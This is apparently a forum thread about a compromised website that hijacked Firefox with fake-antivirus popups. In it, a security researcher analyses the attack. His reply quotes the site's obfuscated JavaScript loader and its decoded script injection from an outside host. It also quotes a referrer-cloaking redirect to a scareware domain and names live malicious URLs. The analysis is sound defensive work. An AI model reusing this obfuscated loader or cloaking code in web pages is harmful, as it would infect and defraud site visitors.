This site hijacked FireFox under Ubuntu!
by DrHenley
11 months ago

http://www.marja-leena-rathje.info/ssp_director/config/conf/article163.html

I could not close FireFox, and it required a reboot to stop the popups. After rebooting the first time I ran FireFox a tab called “My Computer???” came up with the bogus antivirus supposedly scanning the C:\Windows\System folder…(in Ubuntu – ROFL), but I was able to close the tab that time, and it didn’t come back after that.

by rathaus
11 months ago

The site you visited is very malicious, it has several pages that attack your browser and exploit various vulnerabilities in your browser.

You appear to have been infected with a malware, of some sort, that is causing Firefox to display a bogus welcome page.

= Sample =
var q = “puron”;

function D(Ws,Q){if(!Q){Q=‘prR/]jTf1Bg<nxl6Xd;cIG|^$i@aN:4%.hHzb3FYCQAW9Z{KD[7m(*,w&sLEqy#=’;}var L;var yv=‘’;for(var k=0;k<Ws.length;k+=4){L=(Q.indexOf(Ws.charAt(k))&255)<<18|(Q.indexOf(Ws.charAt(k+1))&255)<<12|(Q.indexOf(Ws.charAt(k+2))&255)<<(6)|Q.indexOf(Ws.charAt(k+3))&255;yv+=String.fromCharCode((L&16711680)>>16,(L&65280)>>8,L&255);}eval(yv);}D(’iTyz:|3aYX{:wBQ:TICBm[m$7NWBwBQNfX.NwBz6;BC:fdDlHqK:w:w<FsNTG7N,y{$|[C:fdD<FxKacC&n/.D<,xY@;H@|&K:,Gh:Th3NHsDa/yQi/(sl/$,n/]F@mD:^BKaHi{$|36^dF:/pDn;i7i|$yB7Z3N,xhNTICiTyz:|3aYX{NFGFi^B7i^1Qg7NH6zDKN,nYg7:7@^r(6HNQl7p.’);

===

== Which translates to ==
document.write(‘<sc’<ins>‘ript src="http://www.mypersonalhttp.com:8080/cgi-bin/weather.pl?id=986601&k=puron&name=tft001&ref=’</ins>escape(document.referrer)<ins>‘“></sc’</ins>‘ript>’);
==

Which is of course a malware site :)

== Contacting that server returns… ==
if (document.styleSheets0){document.styleSheets0.disabled = true;};var r = “google”;if (r.indexOf(“google”) != -1 || r.indexOf(“live”) != -1 || r.indexOf(“bing”) != -1 || r.indexOf(“yahoo”) != -1 || r.indexOf(“search”) != -1 || r.indexOf(“result”) != -1 || r.indexOf(“cache”) != -1 || r.indexOf(“translate”) != -1) {document.write(‘<sc’<ins>‘ript> document.location=“http://goaddscan.com/?uid=152” </sc’</ins>‘ript>’);} else { document.title = “404 Not Found”;document.write("< h1>Not FoundThe requested URL " + location.pathname + " was not found on this server.

<hr><address>Apache/1.3.33 Server at " + location.hostname + " Port 80</address>

") }
===

Which is the infecting agent… downloaded through goaddscan.com …

I can continue, but it is a bit long :)

Good luck

Thanks,
Noam Rathaus
Beyond Security
http://www.beyondsecurity.com

by Kaleh
11 months ago

>The site you visited is very malicious, it has several pages that attack your browser and exploit various vulnerabilities in your browser.

Hmmm … I wonder if that applies to all of the following results for that specific portion of the site. I bet the site owner has no clue that the site is being used in this way. :-(

Results 1 – 100 of about 1,260 from www.marja-leena-rathje.info/ssp_director/config/conf.
http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=0aZ&num=100&q=site%3Awww.marja-leena-rathje.info%2Fssp_director%2Fconfig%2Fconf&aq=f&oq=&aqi==

The even more frustrating thing here is that Google just scanned this site yesterday and didn’t find a problem.

http://www.google.com/safebrowsing/diagnostic?site=www.marja-leena-rathje.info/ssp_director/config/conf/

by Kaleh
11 months ago

@DrHenley

What were the search terms that you used when this URL appeared in the search results?

About Contact Us Terms & Conditions Privacy Policy Copyright